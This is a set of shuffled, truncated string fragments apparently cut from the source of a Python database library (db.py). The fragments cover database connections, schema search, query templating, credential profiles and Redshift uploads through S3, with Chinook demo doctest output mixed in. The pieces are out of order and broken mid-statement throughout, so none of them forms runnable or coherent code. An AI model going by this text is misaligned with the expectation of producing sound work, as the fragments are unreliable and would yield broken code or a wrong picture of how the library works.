Track", "be viable... -= if not, there's always a random issue where rows are", "= True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name,", "u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user):", "not in the same order, making doctest fail. db.find_column(\"Name\") # returns all columns", "Exception(\"Couldn't find sqlite library. Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur", "2 2 3 Fast As a Shark 3 2 3 4 Restless and", "= self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate", "and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username =", "= True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True", "varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}',", "<BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name", "8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes", "{'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432,", "= pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables =", "| INTEGER | | Playlist | PlaylistId | INTEGER | | PlaylistTrack |", "3.3+ import uuid import re import os import sys from collections import defaultdict", "one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL", "to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER", "\"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your database's schema", "| | Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId |", "new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta)", "the bucket_location to default. # we can't do this in the function definition", "elif isinstance(data, dict): query = template(data) query = str(query) else: return q return", "\"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True,", "attach to each table to the table name in dict for (table_schema, table_name,", "of the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql", "\\ 0 For Those About To Rock We Salute You 1 Balls to", "db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ | Table | Column", "or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur", "(We Salute You) 1 1 1 2 Balls to the Wall 2 2", "Examples -------- >>> from db import DemoDB >>> db = DemoDB() >>> q", "we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\")", "use an S3 object print_sql: bool (False) option for printing sql statement that", "+-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre | Name |", "f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those", "as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with", "on a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ...", "in the function definition because we're # lazily importing boto only if necessary", "Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f", "bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure it", "profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from", "libraries # TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG =", "__import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\",", "threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if", "nodes have 2 slices per node, so if running 2 nodes you will", "return Examples -------- >>> from db import DemoDB >>> db = DemoDB() >>>", "1. load directly from cache # 2. use a single query for getting", "specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket =", "any metatables (at least ones that fit into our framework), so we're going", "\"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str", "\"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") #", "approach if use_cache: # generate our Tables, and load them into a TableSet", "database profiles available Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname':", "bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name)", "None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {}", "= limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None: raise", "limit=None): \"\"\" Query your database with a raw string. Parameters ---------- q: str", "q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3,", "\"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q,", "nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key.", "1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1", "| Track | Milliseconds | INTEGER | | Track | GenreId | INTEGER", "available Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype':", "(That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default number", "Those About To Rock We Salute You 1 1 2 Balls to the", "is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please", "\"dw\", \"prod\") from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\",", "| Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER | |", "0 Album 347 1 Artist 275 2 Track 3503 >>> q = '''", "1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5", "= [row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table", "self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library.", "sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name,", "if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None,", "name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a TableSet self._tables", "bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self):", "variables s3: S3 alternative to using keys, you can use an S3 object", "\"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = [] tables =", "dbtype==\"mssql\": port = 1433 elif profile is not None: pass else: raise Exception(\"Database", "You 6 For Those About To Rock We Salute You 7 For Those", "... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\",", "6 Let's Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed", "a specific AWS location in which to create the temporary transfer s3 bucket.", "present, set the bucket_location to default. # we can't do this in the", "will probably stop your little sister from stealing your passwords. Parameters ---------- profile:", "and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try:", "| Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | |", "| | Track | AlbumId | INTEGER | | Track | MediaTypeId |", "except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except ImportError:", "creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column')", "according to amazon, this is # much faster when it comes time to", "int Number of records to return Examples -------- >>> from db import DemoDB", "foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql) in", "self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename", "for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value =", "[] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self,", "returns all tables containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\"", "rows_to_insert.append((table, row[1], row[2])) # find for table and column names self.cur.execute(\"drop table if", "self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile)", "S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i,", "TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema", "({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q", "275 2 Track 3503 >>> q = ''' ... SELECT ... {{#cols}} ...", "to redshift via s3. Parameters ---------- name: str name for your shiny new", "is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running", "| CustomerId | INTEGER | | Employee | EmployeeId | INTEGER | |", "with a raw string. Parameters ---------- q: str Query string to execute data:", "1 Balls to the Wall 0.99 2 Fast As a Shark 0.99 3", "| +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee | Address", "| NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that", "a ... INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ...", "mysql, mssql, or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\")", "| GenreId | INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+", "t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref", "s3 bucket. This should match your redshift cluster's region. Examples -------- \"\"\" if", "to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY", "specific AWS location in which to create the temporary transfer s3 bucket. This", "to_dict(self): \"\"\"Dict representation of the database as credentials plus tables dict representation.\"\"\" db_dict", "\"\"\" SQLite doesn't come with any metatables (at least ones that fit into", "row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}',", "if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. the", "not find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not", "INTEGER | | Track | MediaTypeId | INTEGER | | Track | Milliseconds", "Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as", "the Wall 2 2 2 3 Fast As a Shark 3 2 3", "| Album | ArtistId | INTEGER | | Artist | ArtistId | INTEGER", "username for the database password: str Your password for the database hostname: str", "a column. Parameters ----------- search: str glob pattern for what you're looking for", "= pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif", "fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column", "arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\":", "self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([])", "does not exist. Could not find file {1}\".format(name, f)) os.remove(f) except Exception as", "self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in", "4 Let There Be Rock 1 4 5 Big Ones 3 \"\"\" if", "arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg =", "key. if this is None, the function will try and grab AWS_SECRET_KEY from", "raise Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\") self.con = pg.connect(user=self.username,", "---------- >>> from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+", "EmployeeId | INTEGER | | Genre | GenreId | INTEGER | | Invoice", "shiny new table df: DataFrame data frame you want to save to the", "<NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99", "function will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your", "table if it already exists chunk_size: int (10000) Number of DataFrame chunks to", "handlebars queries as a single data frame. limit: int Number of records to", "| Column Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70)", "the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook", "see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks =", "it comes time to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering", "path to sqlite database dbname: str Name of the database schemas: list List", "keys_per_column: int, None Default number of keys to display in the foreign and", "IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\")", "= db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\")", "argument for handlebars-queries. Data will be passed to the template and rendered using", "sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop", "necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't", "}}' as table_name, ... COUNT(*) as cnt ... FROM ... {{ name }}", "INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols = []", "tables as list of tuples if told to use cached metadata if use_cache", "for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\")", "\"prod\") from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\",", "Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\")", "DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album |", "\"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and", "= profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if", "again and looks for any new tables and columns. \"\"\" col_meta, table_meta =", "print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. Parameters ----------", "table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and attach", "for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar,", "the database properties to your db.py profile.\"\"\" if len(self.tables) > 0: f =", "INTEGER | | InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId", ".column import Column, ColumnSet from .table import Table, TableSet from .s3 import S3", "| +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table |", "tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's", "'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\")", "import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql", "self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through", "not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of", "DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\",", "1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from", "the function definition because we're # lazily importing boto only if necessary here.", "s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. Parameters", "= creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column =", "3 4 Let There Be Rock 1 4 5 Big Ones 3 \"\"\"", "name: str name for your shiny new table df: DataFrame data frame you", "format as list of tuples, to match how normal loading is performed for", "| Artist | Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120)", "convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the", "# attempt to import the relevant database libraries # TODO: maybe add warnings?", "is not to say this a secure way to store sensitive data, but", "6 For Those About To Rock We Salute You 7 For Those About", "| TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | |", "GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None", "+ \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. the s3 argument is", "import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try:", "argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way", "libraries. Please ensure one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format(", "The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename)", "method. You can override it by adding limit={X} to the `query` method, or", "os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables:", "exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row", "| INTEGER | | Employee | EmployeeId | INTEGER | | Employee |", "4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860", "return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database", "profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\" user", "% (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\")", "the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a", "row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column", "profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db import", "Wall 2 2 2 3 Fast As a Shark 3 2 3 4", "db.query(q, limit=10) Title \\ 0 For Those About To Rock We Salute You", "Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook =", "11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select", "be executed bucket_location: boto.s3.connection.Location a specific AWS location in which to create the", "Exception(\"Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or", "the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>,", "dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port =", "self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def", "... {{/cols}} ... FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\",", "db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the", "\"Track\"} ... ] >>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist", "| | Track | GenreId | INTEGER | | Track | Bytes |", "| Column Name | Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120)", "tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name,", "def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema for a", "For Those About To Rock We Salute You 6 For Those About To", "dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\",", "<NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider &", "import DemoDB >>> db = DemoDB() >>> q = ''' ... SELECT ...", "as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql)", "columns containing Address +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+", "def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key", "database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is", "0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template = ''' ...", "2 2 2 3 Fast As a Shark 3 2 3 4 Restless", "None means that you'll have verrrrrrrry wide columns in some cases. driver: str,", "hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>>", "Balls to the Wall 2 2 2 3 Fast As a Shark 3", "1 1 6 7 Let's Get It Up 1 1 7 8 Inject", "varchars +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer", "return q return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your", "varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name,", "in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {}", "'ref_keys')} # col metadata: format as list of tuples, to match how normal", "dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur", "foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name", "DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db =", "returns everything \"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search):", "is not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str =", "| NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\")", "HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import pyodbc as pyo", "pass else: raise Exception(\"Database type not specified! Must select one of: postgres, sqlite,", "Track | AlbumId | INTEGER | | Track | MediaTypeId | INTEGER |", "for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection", "pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL", "None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure", "environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on", "About To Rock We Salute You 7 For Those About To Rock We", "print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. the s3", "self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query", "returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all", "there's always a random issue where rows are not in the same order,", "looking for data_type: str, list (optional) specify which data type(s) you want to", "NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | | MediaType | Name", "<NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>,", "self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize", "else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile", "SQL script data: list, dict Optional argument for handlebars-queries. Data will be passed", "your database (i.e. \"dw\", \"prod\") from db import DB import pymysql db =", "= TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def", "already exists chunk_size: int (10000) Number of DataFrame chunks to upload and COPY", "profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name}", "password for the database hostname: str Hostname your database is running on (i.e.", "or by passing an argument to `DB()`. None indicates that there will be", "way for all those doctests to be viable... -= if not, there's always", "8 6599424 0.99 9 8611245 0.99 >>> q = ''' ... SELECT ...", "and Wild 2 3 4 Let There Be Rock 1 4 5 Big", "len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for all those", "control the rendering of PrettyTable a bit. None means that you'll have verrrrrrrry", "all those doctests to be viable... -= if not, there's always a random", "1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>,", "if dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache:", "as pg HAS_PG = True except ImportError: HAS_PG = False try: import MySQLdb", "of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or", "query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query) else:", "Salute You) 1 1 1 2 Balls to the Wall 2 2 <BLANKLINE>", "2 Balls to the Wall 2 2 3 Restless and Wild 2 3", "As a Shark 3 2 3 4 Restless and Wild 3 2 4", "This should match your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise", "data: q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return", "self.cur: # second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db'])", "... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title", ".query_templates import query_templates # attempt to import the relevant database libraries # TODO:", "375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926", "if (sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data,", "[data_type] cols = [] for table in self.tables: for col in vars(table): if", "MediaTypeId \\\\\\r 0 1 For Those About To Rock (We Salute You) 1", "5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451", "| InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER", "DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info.", "from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID", "(\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name,", "is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices", "if this is None, the function will try and grab AWS_SECRET_KEY from your", "Optional argument for handlebars-queries. Data will be passed to the template and rendered", "can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name", "u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>,", "identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if", "| NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") #", "here. the s3 argument is a prefix, so it'll pick up # all", 